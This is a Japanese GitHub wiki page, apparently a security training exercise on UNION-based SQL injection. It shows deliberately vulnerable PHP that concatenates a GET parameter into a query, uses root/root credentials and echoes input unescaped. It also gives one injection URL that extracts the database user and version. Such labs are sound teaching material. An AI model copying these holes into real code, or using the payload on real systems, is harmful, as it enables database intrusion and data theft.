SQLインジェクション 01 - yujitounai/helloworld GitHub Wiki

SQLインジェクション-01

UNIONでデータが取れるSQLインジェクション

脆弱なソースコード (PHP)

<?php
function connectDB(){
    $dbserver = "mysql:host=mysql; dbname=vuln; charset=utf8";
    $dbusername = "root";
    $dbpassword = "root";
    try {
        $GLOBALS['pdo'] = new PDO($dbserver, $dbusername, $dbpassword);
        $GLOBALS['pdo']->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
    } catch (PDOException $e) {
        $msg = $e->getMessage();
    }
}
if(isset($_GET['id'])){
    connectDB();
    $id = filter_input(INPUT_GET,"id");
    try {
        $sql = "SELECT * FROM users where id =".$id." limit 1";
        $stmt = $pdo->prepare($sql);
        $stmt->execute();
	    $user = $stmt->fetch();
        if($user['id']){
            echo "<div class=\"main\"><table><thead><tr><th></th><th></th></tr></thead><tbody>";
            echo "<tr><th>id</th><td>".htmlspecialchars($user['id'], ENT_QUOTES, 'UTF-8')."</td></tr>";
            echo "<tr><th>user</th><td>".htmlspecialchars($user['user'], ENT_QUOTES, 'UTF-8')."</td></tr>";
            echo "<tr><th>mail address</th><td>".htmlspecialchars($user['mail'], ENT_QUOTES, 'UTF-8')."</td></tr>";
            echo "<tr><th>isAdmin</th><td>".htmlspecialchars($user['isAdmin'], ENT_QUOTES, 'UTF-8')."</td></tr>";
            echo "<tr><th>isWritable</th><td>".htmlspecialchars($user['isWritable'], ENT_QUOTES, 'UTF-8')."</td></tr>";
            echo "<tr><th>profile</th><td>".htmlspecialchars($user['profile'], ENT_QUOTES, 'UTF-8')."</td></tr>";
            echo "</tdoby></table>";
            echo "</div>";
        }else{
            echo "<div class=\"main\">id ". $id ." is not exist</div>";
        }
    } catch (PDOException $e) {
        $msg = $e->getMessage();
    }
}else {
    echo "usage: ?id=1";
    echo "<br>";
    highlight_file(__FILE__);
}
?>

攻撃方法

/users/user.php?id=7%20union%20select%201,user(),version(),4,5,6,7,8

⚠️ **GitHub.com Fallback** ⚠️